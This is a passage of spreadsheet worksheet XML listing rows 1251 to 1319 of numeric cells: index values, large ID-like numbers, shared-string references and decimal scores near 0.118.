        <v>6</v>
      </c>
      <c r="F1251" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1252" ht="15.75" customHeight="1">
      <c r="A1252" s="1">
        <v>870.0</v>
      </c>
      <c r="B1252" s="2">
        <v>2.1869936E7</v>
      </c>
      <c r="C1252" s="2" t="s">
        <v>1128</v>
      </c>
      <c r="D1252" s="2">
        <v>1.0</v>
      </c>
      <c r="E1252" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1252" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1253" ht="15.75" customHeight="1">
      <c r="A1253" s="1">
        <v>1197.0</v>
      </c>
      <c r="B1253" s="2">
        <v>2.4738492E7</v>
      </c>
      <c r="C1253" s="2" t="s">
        <v>1129</v>
      </c>
      <c r="D1253" s="2">
        <v>1.0</v>
      </c>
      <c r="E1253" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1253" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1254" ht="15.75" customHeight="1">
      <c r="A1254" s="1">
        <v>1325.0</v>
      </c>
      <c r="B1254" s="2">
        <v>2.5778989E7</v>
      </c>
      <c r="C1254" s="2" t="s">
        <v>1130</v>
      </c>
      <c r="D1254" s="2">
        <v>1.0</v>
      </c>
      <c r="E1254" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1254" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1255" ht="15.75" customHeight="1">
      <c r="A1255" s="1">
        <v>3305.0</v>
      </c>
      <c r="B1255" s="2">
        <v>3.7585646E7</v>
      </c>
      <c r="C1255" s="2" t="s">
        <v>1131</v>
      </c>
      <c r="D1255" s="2">
        <v>1.0</v>
      </c>
      <c r="E1255" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1255" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1256" ht="15.75" customHeight="1">
      <c r="A1256" s="1">
        <v>5360.0</v>
      </c>
      <c r="B1256" s="2">
        <v>4.5370622E7</v>
      </c>
      <c r="C1256" s="2" t="s">
        <v>1132</v>
      </c>
      <c r="D1256" s="2">
        <v>1.0</v>
      </c>
      <c r="E1256" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1256" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1257" ht="15.75" customHeight="1">
      <c r="A1257" s="1">
        <v>13290.0</v>
      </c>
      <c r="B1257" s="2">
        <v>3.4450019E7</v>
      </c>
      <c r="C1257" s="2" t="s">
        <v>1133</v>
      </c>
      <c r="D1257" s="2">
        <v>1.0</v>
      </c>
      <c r="E1257" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1257" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1258" ht="15.75" customHeight="1">
      <c r="A1258" s="1">
        <v>13510.0</v>
      </c>
      <c r="B1258" s="2">
        <v>3.5461856E7</v>
      </c>
      <c r="C1258" s="2" t="s">
        <v>1134</v>
      </c>
      <c r="D1258" s="2">
        <v>1.0</v>
      </c>
      <c r="E1258" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1258" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1259" ht="15.75" customHeight="1">
      <c r="A1259" s="1">
        <v>14167.0</v>
      </c>
      <c r="B1259" s="2">
        <v>3.8032309E7</v>
      </c>
      <c r="C1259" s="2" t="s">
        <v>1135</v>
      </c>
      <c r="D1259" s="2">
        <v>1.0</v>
      </c>
      <c r="E1259" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1259" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1260" ht="15.75" customHeight="1">
      <c r="A1260" s="1">
        <v>14871.0</v>
      </c>
      <c r="B1260" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C1260" s="2" t="s">
        <v>1136</v>
      </c>
      <c r="D1260" s="2">
        <v>1.0</v>
      </c>
      <c r="E1260" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1260" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1261" ht="15.75" customHeight="1">
      <c r="A1261" s="1">
        <v>15162.0</v>
      </c>
      <c r="B1261" s="2">
        <v>4.1999996E7</v>
      </c>
      <c r="C1261" s="2" t="s">
        <v>1137</v>
      </c>
      <c r="D1261" s="2">
        <v>1.0</v>
      </c>
      <c r="E1261" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1261" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1262" ht="15.75" customHeight="1">
      <c r="A1262" s="1">
        <v>15654.0</v>
      </c>
      <c r="B1262" s="2">
        <v>4.3633248E7</v>
      </c>
      <c r="C1262" s="2" t="s">
        <v>1138</v>
      </c>
      <c r="D1262" s="2">
        <v>1.0</v>
      </c>
      <c r="E1262" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1262" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1263" ht="15.75" customHeight="1">
      <c r="A1263" s="1">
        <v>17447.0</v>
      </c>
      <c r="B1263" s="2">
        <v>4.9792301E7</v>
      </c>
      <c r="C1263" s="2" t="s">
        <v>1139</v>
      </c>
      <c r="D1263" s="2">
        <v>1.0</v>
      </c>
      <c r="E1263" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1263" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1264" ht="15.75" customHeight="1">
      <c r="A1264" s="1">
        <v>18487.0</v>
      </c>
      <c r="B1264" s="2">
        <v>5.2899273E7</v>
      </c>
      <c r="C1264" s="2" t="s">
        <v>1140</v>
      </c>
      <c r="D1264" s="2">
        <v>1.0</v>
      </c>
      <c r="E1264" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1264" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1265" ht="15.75" customHeight="1">
      <c r="A1265" s="1">
        <v>18651.0</v>
      </c>
      <c r="B1265" s="2">
        <v>5.3466944E7</v>
      </c>
      <c r="C1265" s="2" t="s">
        <v>1141</v>
      </c>
      <c r="D1265" s="2">
        <v>1.0</v>
      </c>
      <c r="E1265" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1265" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1266" ht="15.75" customHeight="1">
      <c r="A1266" s="1">
        <v>19838.0</v>
      </c>
      <c r="B1266" s="2">
        <v>5.7059731E7</v>
      </c>
      <c r="C1266" s="2" t="s">
        <v>1142</v>
      </c>
      <c r="D1266" s="2">
        <v>1.0</v>
      </c>
      <c r="E1266" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1266" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1267" ht="15.75" customHeight="1">
      <c r="A1267" s="1">
        <v>21060.0</v>
      </c>
      <c r="B1267" s="2">
        <v>1.7800528E7</v>
      </c>
      <c r="C1267" s="2" t="s">
        <v>1143</v>
      </c>
      <c r="D1267" s="2">
        <v>1.0</v>
      </c>
      <c r="E1267" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1267" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1268" ht="15.75" customHeight="1">
      <c r="A1268" s="1">
        <v>21523.0</v>
      </c>
      <c r="B1268" s="2">
        <v>2.3316264E7</v>
      </c>
      <c r="C1268" s="2" t="s">
        <v>1144</v>
      </c>
      <c r="D1268" s="2">
        <v>1.0</v>
      </c>
      <c r="E1268" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1268" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1269" ht="15.75" customHeight="1">
      <c r="A1269" s="1">
        <v>22034.0</v>
      </c>
      <c r="B1269" s="2">
        <v>3.0192161E7</v>
      </c>
      <c r="C1269" s="2" t="s">
        <v>1145</v>
      </c>
      <c r="D1269" s="2">
        <v>1.0</v>
      </c>
      <c r="E1269" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1269" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1270" ht="15.75" customHeight="1">
      <c r="A1270" s="1">
        <v>22205.0</v>
      </c>
      <c r="B1270" s="2">
        <v>3.206164E7</v>
      </c>
      <c r="C1270" s="2" t="s">
        <v>1145</v>
      </c>
      <c r="D1270" s="2">
        <v>1.0</v>
      </c>
      <c r="E1270" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1270" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1271" ht="15.75" customHeight="1">
      <c r="A1271" s="1">
        <v>22838.0</v>
      </c>
      <c r="B1271" s="2">
        <v>4.6577937E7</v>
      </c>
      <c r="C1271" s="2" t="s">
        <v>1146</v>
      </c>
      <c r="D1271" s="2">
        <v>1.0</v>
      </c>
      <c r="E1271" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1271" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1272" ht="15.75" customHeight="1">
      <c r="A1272" s="1">
        <v>22939.0</v>
      </c>
      <c r="B1272" s="2">
        <v>4.882956E7</v>
      </c>
      <c r="C1272" s="2" t="s">
        <v>1147</v>
      </c>
      <c r="D1272" s="2">
        <v>1.0</v>
      </c>
      <c r="E1272" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1272" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1273" ht="15.75" customHeight="1">
      <c r="A1273" s="1">
        <v>23602.0</v>
      </c>
      <c r="B1273" s="2">
        <v>6396132.0</v>
      </c>
      <c r="C1273" s="2" t="s">
        <v>1148</v>
      </c>
      <c r="D1273" s="2">
        <v>1.0</v>
      </c>
      <c r="E1273" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1273" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1274" ht="15.75" customHeight="1">
      <c r="A1274" s="1">
        <v>23739.0</v>
      </c>
      <c r="B1274" s="2">
        <v>7350340.0</v>
      </c>
      <c r="C1274" s="2" t="s">
        <v>1149</v>
      </c>
      <c r="D1274" s="2">
        <v>1.0</v>
      </c>
      <c r="E1274" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1274" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1275" ht="15.75" customHeight="1">
      <c r="A1275" s="1">
        <v>24798.0</v>
      </c>
      <c r="B1275" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C1275" s="2" t="s">
        <v>1150</v>
      </c>
      <c r="D1275" s="2">
        <v>1.0</v>
      </c>
      <c r="E1275" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1275" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1276" ht="15.75" customHeight="1">
      <c r="A1276" s="1">
        <v>25028.0</v>
      </c>
      <c r="B1276" s="2">
        <v>1.2828729E7</v>
      </c>
      <c r="C1276" s="2" t="s">
        <v>1151</v>
      </c>
      <c r="D1276" s="2">
        <v>1.0</v>
      </c>
      <c r="E1276" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1276" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1277" ht="15.75" customHeight="1">
      <c r="A1277" s="1">
        <v>25733.0</v>
      </c>
      <c r="B1277" s="2">
        <v>1.4584557E7</v>
      </c>
      <c r="C1277" s="2" t="s">
        <v>1152</v>
      </c>
      <c r="D1277" s="2">
        <v>1.0</v>
      </c>
      <c r="E1277" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1277" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1278" ht="15.75" customHeight="1">
      <c r="A1278" s="1">
        <v>26169.0</v>
      </c>
      <c r="B1278" s="2">
        <v>1.6098932E7</v>
      </c>
      <c r="C1278" s="2" t="s">
        <v>1153</v>
      </c>
      <c r="D1278" s="2">
        <v>1.0</v>
      </c>
      <c r="E1278" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1278" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1279" ht="15.75" customHeight="1">
      <c r="A1279" s="1">
        <v>27099.0</v>
      </c>
      <c r="B1279" s="2">
        <v>2.0547628E7</v>
      </c>
      <c r="C1279" s="2" t="s">
        <v>1154</v>
      </c>
      <c r="D1279" s="2">
        <v>1.0</v>
      </c>
      <c r="E1279" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1279" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1280" ht="15.75" customHeight="1">
      <c r="A1280" s="1">
        <v>27425.0</v>
      </c>
      <c r="B1280" s="2">
        <v>2.1901851E7</v>
      </c>
      <c r="C1280" s="2" t="s">
        <v>1155</v>
      </c>
      <c r="D1280" s="2">
        <v>1.0</v>
      </c>
      <c r="E1280" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1280" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1281" ht="15.75" customHeight="1">
      <c r="A1281" s="1">
        <v>28109.0</v>
      </c>
      <c r="B1281" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C1281" s="2" t="s">
        <v>1156</v>
      </c>
      <c r="D1281" s="2">
        <v>1.0</v>
      </c>
      <c r="E1281" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1281" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1282" ht="15.75" customHeight="1">
      <c r="A1282" s="1">
        <v>28995.0</v>
      </c>
      <c r="B1282" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C1282" s="2" t="s">
        <v>1157</v>
      </c>
      <c r="D1282" s="2">
        <v>1.0</v>
      </c>
      <c r="E1282" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1282" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1283" ht="15.75" customHeight="1">
      <c r="A1283" s="1">
        <v>29043.0</v>
      </c>
      <c r="B1283" s="2">
        <v>3.019216E7</v>
      </c>
      <c r="C1283" s="2" t="s">
        <v>1145</v>
      </c>
      <c r="D1283" s="2">
        <v>1.0</v>
      </c>
      <c r="E1283" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1283" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1284" ht="15.75" customHeight="1">
      <c r="A1284" s="1">
        <v>29300.0</v>
      </c>
      <c r="B1284" s="2">
        <v>3.1235839E7</v>
      </c>
      <c r="C1284" s="2" t="s">
        <v>1158</v>
      </c>
      <c r="D1284" s="2">
        <v>1.0</v>
      </c>
      <c r="E1284" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1284" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1285" ht="15.75" customHeight="1">
      <c r="A1285" s="1">
        <v>29408.0</v>
      </c>
      <c r="B1285" s="2">
        <v>3.2061639E7</v>
      </c>
      <c r="C1285" s="2" t="s">
        <v>1145</v>
      </c>
      <c r="D1285" s="2">
        <v>1.0</v>
      </c>
      <c r="E1285" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1285" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1286" ht="15.75" customHeight="1">
      <c r="A1286" s="1">
        <v>31083.0</v>
      </c>
      <c r="B1286" s="2">
        <v>4.8337242E7</v>
      </c>
      <c r="C1286" s="2" t="s">
        <v>1159</v>
      </c>
      <c r="D1286" s="2">
        <v>1.0</v>
      </c>
      <c r="E1286" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1286" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1287" ht="15.75" customHeight="1">
      <c r="A1287" s="1">
        <v>32487.0</v>
      </c>
      <c r="B1287" s="2">
        <v>5.7006194E7</v>
      </c>
      <c r="C1287" s="2" t="s">
        <v>1160</v>
      </c>
      <c r="D1287" s="2">
        <v>1.0</v>
      </c>
      <c r="E1287" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1287" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1288" ht="15.75" customHeight="1">
      <c r="A1288" s="1">
        <v>33915.0</v>
      </c>
      <c r="B1288" s="2">
        <v>9236453.0</v>
      </c>
      <c r="C1288" s="2" t="s">
        <v>1161</v>
      </c>
      <c r="D1288" s="2">
        <v>1.0</v>
      </c>
      <c r="E1288" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1288" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="1289" ht="15.75" customHeight="1">
      <c r="A1289" s="1">
        <v>9221.0</v>
      </c>
      <c r="B1289" s="2">
        <v>5.5434233E7</v>
      </c>
      <c r="C1289" s="2" t="s">
        <v>1162</v>
      </c>
      <c r="D1289" s="2">
        <v>1.0</v>
      </c>
      <c r="E1289" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1289" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="1290" ht="15.75" customHeight="1">
      <c r="A1290" s="1">
        <v>17420.0</v>
      </c>
      <c r="B1290" s="2">
        <v>4.9699033E7</v>
      </c>
      <c r="C1290" s="2" t="s">
        <v>1163</v>
      </c>
      <c r="D1290" s="2">
        <v>1.0</v>
      </c>
      <c r="E1290" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1290" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="1291" ht="15.75" customHeight="1">
      <c r="A1291" s="1">
        <v>28288.0</v>
      </c>
      <c r="B1291" s="2">
        <v>2.5527421E7</v>
      </c>
      <c r="C1291" s="2" t="s">
        <v>1164</v>
      </c>
      <c r="D1291" s="2">
        <v>1.0</v>
      </c>
      <c r="E1291" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1291" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="1292" ht="15.75" customHeight="1">
      <c r="A1292" s="1">
        <v>17417.0</v>
      </c>
      <c r="B1292" s="2">
        <v>4.9689963E7</v>
      </c>
      <c r="C1292" s="2" t="s">
        <v>1165</v>
      </c>
      <c r="D1292" s="2">
        <v>1.0</v>
      </c>
      <c r="E1292" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1292" s="2">
        <v>0.1182539682539683</v>
      </c>
    </row>
    <row r="1293" ht="15.75" customHeight="1">
      <c r="A1293" s="1">
        <v>14615.0</v>
      </c>
      <c r="B1293" s="2">
        <v>4.0266284E7</v>
      </c>
      <c r="C1293" s="2" t="s">
        <v>1166</v>
      </c>
      <c r="D1293" s="2">
        <v>1.0</v>
      </c>
      <c r="E1293" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1293" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="1294" ht="15.75" customHeight="1">
      <c r="A1294" s="1">
        <v>29915.0</v>
      </c>
      <c r="B1294" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C1294" s="2" t="s">
        <v>1167</v>
      </c>
      <c r="D1294" s="2">
        <v>1.0</v>
      </c>
      <c r="E1294" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1294" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="1295" ht="15.75" customHeight="1">
      <c r="A1295" s="1">
        <v>18596.0</v>
      </c>
      <c r="B1295" s="2">
        <v>5.3259342E7</v>
      </c>
      <c r="C1295" s="2" t="s">
        <v>1168</v>
      </c>
      <c r="D1295" s="2">
        <v>1.0</v>
      </c>
      <c r="E1295" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1295" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="1296" ht="15.75" customHeight="1">
      <c r="A1296" s="1">
        <v>21919.0</v>
      </c>
      <c r="B1296" s="2">
        <v>2.8345503E7</v>
      </c>
      <c r="C1296" s="2" t="s">
        <v>1169</v>
      </c>
      <c r="D1296" s="2">
        <v>1.0</v>
      </c>
      <c r="E1296" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1296" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="1297" ht="15.75" customHeight="1">
      <c r="A1297" s="1">
        <v>22697.0</v>
      </c>
      <c r="B1297" s="2">
        <v>4.2411718E7</v>
      </c>
      <c r="C1297" s="2" t="s">
        <v>1170</v>
      </c>
      <c r="D1297" s="2">
        <v>1.0</v>
      </c>
      <c r="E1297" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1297" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="1298" ht="15.75" customHeight="1">
      <c r="A1298" s="1">
        <v>5745.0</v>
      </c>
      <c r="B1298" s="2">
        <v>4.6642002E7</v>
      </c>
      <c r="C1298" s="2" t="s">
        <v>1171</v>
      </c>
      <c r="D1298" s="2">
        <v>1.0</v>
      </c>
      <c r="E1298" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1298" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="1299" ht="15.75" customHeight="1">
      <c r="A1299" s="1">
        <v>10616.0</v>
      </c>
      <c r="B1299" s="2">
        <v>1.3749837E7</v>
      </c>
      <c r="C1299" s="2" t="s">
        <v>1172</v>
      </c>
      <c r="D1299" s="2">
        <v>1.0</v>
      </c>
      <c r="E1299" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1299" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1300" ht="15.75" customHeight="1">
      <c r="A1300" s="1">
        <v>12939.0</v>
      </c>
      <c r="B1300" s="2">
        <v>3.2367943E7</v>
      </c>
      <c r="C1300" s="2" t="s">
        <v>1173</v>
      </c>
      <c r="D1300" s="2">
        <v>1.0</v>
      </c>
      <c r="E1300" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1300" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1301" ht="15.75" customHeight="1">
      <c r="A1301" s="1">
        <v>16320.0</v>
      </c>
      <c r="B1301" s="2">
        <v>4.5983691E7</v>
      </c>
      <c r="C1301" s="2" t="s">
        <v>1174</v>
      </c>
      <c r="D1301" s="2">
        <v>1.0</v>
      </c>
      <c r="E1301" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1301" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1302" ht="15.75" customHeight="1">
      <c r="A1302" s="1">
        <v>21306.0</v>
      </c>
      <c r="B1302" s="2">
        <v>2.0765249E7</v>
      </c>
      <c r="C1302" s="2" t="s">
        <v>1175</v>
      </c>
      <c r="D1302" s="2">
        <v>1.0</v>
      </c>
      <c r="E1302" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1302" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1303" ht="15.75" customHeight="1">
      <c r="A1303" s="1">
        <v>28215.0</v>
      </c>
      <c r="B1303" s="2">
        <v>2.5054796E7</v>
      </c>
      <c r="C1303" s="2" t="s">
        <v>1176</v>
      </c>
      <c r="D1303" s="2">
        <v>1.0</v>
      </c>
      <c r="E1303" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1303" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1304" ht="15.75" customHeight="1">
      <c r="A1304" s="1">
        <v>32845.0</v>
      </c>
      <c r="B1304" s="2">
        <v>6252743.0</v>
      </c>
      <c r="C1304" s="2" t="s">
        <v>1177</v>
      </c>
      <c r="D1304" s="2">
        <v>1.0</v>
      </c>
      <c r="E1304" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1304" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1305" ht="15.75" customHeight="1">
      <c r="A1305" s="1">
        <v>32993.0</v>
      </c>
      <c r="B1305" s="2">
        <v>6607458.0</v>
      </c>
      <c r="C1305" s="2" t="s">
        <v>1178</v>
      </c>
      <c r="D1305" s="2">
        <v>1.0</v>
      </c>
      <c r="E1305" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1305" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="1306" ht="15.75" customHeight="1">
      <c r="A1306" s="1">
        <v>6243.0</v>
      </c>
      <c r="B1306" s="2">
        <v>4.8098424E7</v>
      </c>
      <c r="C1306" s="2" t="s">
        <v>1179</v>
      </c>
      <c r="D1306" s="2">
        <v>1.0</v>
      </c>
      <c r="E1306" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1306" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="1307" ht="15.75" customHeight="1">
      <c r="A1307" s="1">
        <v>24002.0</v>
      </c>
      <c r="B1307" s="2">
        <v>9246746.0</v>
      </c>
      <c r="C1307" s="2" t="s">
        <v>1180</v>
      </c>
      <c r="D1307" s="2">
        <v>1.0</v>
      </c>
      <c r="E1307" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1307" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="1308" ht="15.75" customHeight="1">
      <c r="A1308" s="1">
        <v>30146.0</v>
      </c>
      <c r="B1308" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C1308" s="2" t="s">
        <v>1181</v>
      </c>
      <c r="D1308" s="2">
        <v>1.0</v>
      </c>
      <c r="E1308" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1308" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="1309" ht="15.75" customHeight="1">
      <c r="A1309" s="1">
        <v>946.0</v>
      </c>
      <c r="B1309" s="2">
        <v>2.2571346E7</v>
      </c>
      <c r="C1309" s="2" t="s">
        <v>1182</v>
      </c>
      <c r="D1309" s="2">
        <v>1.0</v>
      </c>
      <c r="E1309" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1309" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="1310" ht="15.75" customHeight="1">
      <c r="A1310" s="1">
        <v>9539.0</v>
      </c>
      <c r="B1310" s="2">
        <v>5.6018601E7</v>
      </c>
      <c r="C1310" s="2" t="s">
        <v>1183</v>
      </c>
      <c r="D1310" s="2">
        <v>1.0</v>
      </c>
      <c r="E1310" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1310" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="1311" ht="15.75" customHeight="1">
      <c r="A1311" s="1">
        <v>28966.0</v>
      </c>
      <c r="B1311" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C1311" s="2" t="s">
        <v>1184</v>
      </c>
      <c r="D1311" s="2">
        <v>1.0</v>
      </c>
      <c r="E1311" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1311" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="1312" ht="15.75" customHeight="1">
      <c r="A1312" s="1">
        <v>29600.0</v>
      </c>
      <c r="B1312" s="2">
        <v>3.3566861E7</v>
      </c>
      <c r="C1312" s="2" t="s">
        <v>1185</v>
      </c>
      <c r="D1312" s="2">
        <v>1.0</v>
      </c>
      <c r="E1312" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1312" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="1313" ht="15.75" customHeight="1">
      <c r="A1313" s="1">
        <v>9203.0</v>
      </c>
      <c r="B1313" s="2">
        <v>5.5405184E7</v>
      </c>
      <c r="C1313" s="2" t="s">
        <v>1186</v>
      </c>
      <c r="D1313" s="2">
        <v>1.0</v>
      </c>
      <c r="E1313" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1313" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="1314" ht="15.75" customHeight="1">
      <c r="A1314" s="1">
        <v>22229.0</v>
      </c>
      <c r="B1314" s="2">
        <v>3.2433978E7</v>
      </c>
      <c r="C1314" s="2" t="s">
        <v>1187</v>
      </c>
      <c r="D1314" s="2">
        <v>1.0</v>
      </c>
      <c r="E1314" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1314" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="1315" ht="15.75" customHeight="1">
      <c r="A1315" s="1">
        <v>29212.0</v>
      </c>
      <c r="B1315" s="2">
        <v>3.0784347E7</v>
      </c>
      <c r="C1315" s="2" t="s">
        <v>1188</v>
      </c>
      <c r="D1315" s="2">
        <v>1.0</v>
      </c>
      <c r="E1315" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1315" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="1316" ht="15.75" customHeight="1">
      <c r="A1316" s="1">
        <v>31237.0</v>
      </c>
      <c r="B1316" s="2">
        <v>4.9284375E7</v>
      </c>
      <c r="C1316" s="2" t="s">
        <v>1189</v>
      </c>
      <c r="D1316" s="2">
        <v>1.0</v>
      </c>
      <c r="E1316" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1316" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="1317" ht="15.75" customHeight="1">
      <c r="A1317" s="1">
        <v>31970.0</v>
      </c>
      <c r="B1317" s="2">
        <v>5.3160491E7</v>
      </c>
      <c r="C1317" s="2" t="s">
        <v>1190</v>
      </c>
      <c r="D1317" s="2">
        <v>1.0</v>
      </c>
      <c r="E1317" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1317" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="1318" ht="15.75" customHeight="1">
      <c r="A1318" s="1">
        <v>7910.0</v>
      </c>
      <c r="B1318" s="2">
        <v>5.2493017E7</v>
      </c>
      <c r="C1318" s="2" t="s">
        <v>1191</v>
      </c>
      <c r="D1318" s="2">
        <v>1.0</v>
      </c>
      <c r="E1318" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1318" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1319" ht="15.75" customHeight="1">
